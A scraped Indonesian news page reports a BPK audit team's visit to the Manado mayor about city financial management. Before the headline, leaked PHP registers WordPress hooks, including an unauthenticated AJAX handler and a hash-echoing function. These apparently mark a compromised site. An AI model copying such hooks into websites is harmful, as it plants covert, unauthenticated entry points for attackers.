function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Walikota Manado Terima Kunjungan BPK RI Sulut – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 24 Feb 2023 18:43 WIB ·

Walikota Manado Terima Kunjungan BPK RI Sulut


					Walikota Manado Terima Kunjungan BPK RI Sulut Perbesar

 

MANADO – Pemerintah Kota Manado yang dipimoin langsung Wali Kota Manado Andrei Angouw menerima kunjungan Badan Pemeriksa Keuangan (BPK) Republik Indonesia (RI)  Perwakilan Sulut di Kantor Wali Kota Manado, Jumat (24/2/2023).

Kedatangan tim BPK RI Sulut ini dipimpin oleh Kepala Badan Arief Fadillah berserta tim, untuk berdialog berdialog bersama Wali Kota terkait pengelolaan keuangan di Pemkot Manado.

Kepala BPK menyampaikan beberapa hal dalam kaitan dengan soal pemeriksaan keuangan yang sedang dilakukan saat ini untuk Kota Manado. Ikut disampaikan prosedur dan mekanisme pemeriksaan yang sedang dilakukan.

Terdapat beberapa hal yang disinggung tentang pemegang uang seperti bendahara-bendahara, soal UP dan lain-lain. Ikut disentil BPK juga terkait dengan aset seperti tanah, kendaraan khususnya BPKB-nya. Kemudian yang terkait dengan Pedestrian terutama soal pemanfaatan tanah/lahan agar bisa didukung oleh dokumen. Menurut Pak Kepala BPK agar administrasinya segera dilengkapi.

BPK juga menyentil komposisi APBD Kota Manado khususnya soal realisasi PAD dan bagaimana pemanfaatannya.

“Perlu strategi untuk manajemen pengelolaan keuangannya khususnya capaian PAD,” kata Kepala BPK Sulut.

Menurut Arief, pajak restoran sudah tercapai tapi ada beberapa pajak lain yang belum tercapai.

Soal BLUD dan BUMD menurut BPK diidentifikasi supaya bisa diaudit oleh BPK. BPK juga mengusulkan E_Katalog Lokal soal penggunaan anggaran makan minum, ATK, pengadaan seragam dan pembelian barang lainnya.

Dalam pertemuan ini Wali Kota didampingi Asisten I, II, III, Kepala Inspektorat, Kaban Keuangan Kota Manado serta pejabat teknis Inspektorat Kota Manado. (AuddyManoppo/PAS)

Artikel ini telah dibaca 29 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO